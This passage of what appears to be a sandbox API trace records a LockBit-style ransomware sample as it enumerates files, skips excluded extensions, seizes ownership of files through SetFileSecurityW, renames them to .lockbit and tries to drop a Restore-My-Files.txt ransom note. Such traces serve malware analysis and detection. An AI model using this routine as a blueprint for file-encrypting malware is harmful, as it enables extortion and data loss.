(lpString1=".theme", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.229] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.230] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.231] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.231] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_jpn.xml") returned 1 [0081.231] lstrcmpiW (lpString1="ntldr", lpString2="base_jpn.xml") returned 1 [0081.231] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_jpn.xml") returned 1 [0081.231] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_jpn.xml") returned 1 [0081.231] lstrcmpiW (lpString1="autorun.inf", lpString2="base_jpn.xml") returned -1 [0081.231] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.231] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned=".xml" [0081.231] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.231] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.231] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.232] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.232] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit") returned 91 [0081.232] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.232] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit")) returned 0 [0081.233] GetLastError () returned 0x5 [0081.233] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.233] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.233] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.233] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.234] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.234] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b8, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.234] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.234] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.247] NtClose (Handle=0x3b8) returned 0x0 [0081.247] RtlFreeAnsiString (AnsiString="\\") [0081.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b8) returned 1 [0081.248] malloc (_Size=0x200) returned 0x53fcc0 [0081.248] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.248] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.248] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.248] CloseHandle (hObject=0x3b8) returned 1 [0081.248] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.248] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.249] free (_Block=0x53fcc0) [0081.249] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.249] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit")) returned 1 [0081.250] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0081.250] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.250] malloc (_Size=0x40068) returned 0x20abae0 [0081.250] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=804) returned 1 [0081.250] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.256] GetLastError () returned 0x3e5 [0081.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.256] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.256] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.256] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0081.256] lstrcmpiW (lpString1=".", lpString2="base_kor.xml") returned -1 [0081.256] lstrcmpiW (lpString1="..", lpString2="base_kor.xml") returned -1 [0081.256] PathFindExtensionW (pszPath="base_kor.xml") returned=".xml" [0081.256] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.256] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.257] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.258] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.258] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.258] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_kor.xml") returned 1 [0081.258] lstrcmpiW (lpString1="ntldr", lpString2="base_kor.xml") returned 1 [0081.258] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_kor.xml") returned 1 [0081.258] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_kor.xml") returned 1 [0081.258] lstrcmpiW (lpString1="autorun.inf", lpString2="base_kor.xml") returned -1 [0081.259] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.259] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned=".xml" [0081.259] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.259] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.259] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.260] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.260] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit") returned 91 [0081.260] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.260] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit")) returned 0 [0081.268] GetLastError () returned 0x5 [0081.269] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.269] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.269] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.269] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.269] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.269] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.270] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.270] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.279] NtClose (Handle=0x3b0) returned 0x0 [0081.279] RtlFreeAnsiString (AnsiString="\\") [0081.279] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0081.280] malloc (_Size=0x200) returned 0x53fcc0 [0081.280] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.280] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.280] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.280] CloseHandle (hObject=0x3b0) returned 1 [0081.280] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.280] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.281] free (_Block=0x53fcc0) [0081.281] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit")) returned 1 [0081.282] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0081.282] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.282] malloc (_Size=0x40068) returned 0x206b860 [0081.282] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=488) returned 1 [0081.282] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.283] GetLastError () returned 0x3e5 [0081.283] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.283] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.284] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.284] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0081.284] lstrcmpiW (lpString1=".", lpString2="base_rtl.xml") returned -1 [0081.284] lstrcmpiW (lpString1="..", lpString2="base_rtl.xml") returned -1 [0081.284] PathFindExtensionW (pszPath="base_rtl.xml") returned=".xml" [0081.284] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.284] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 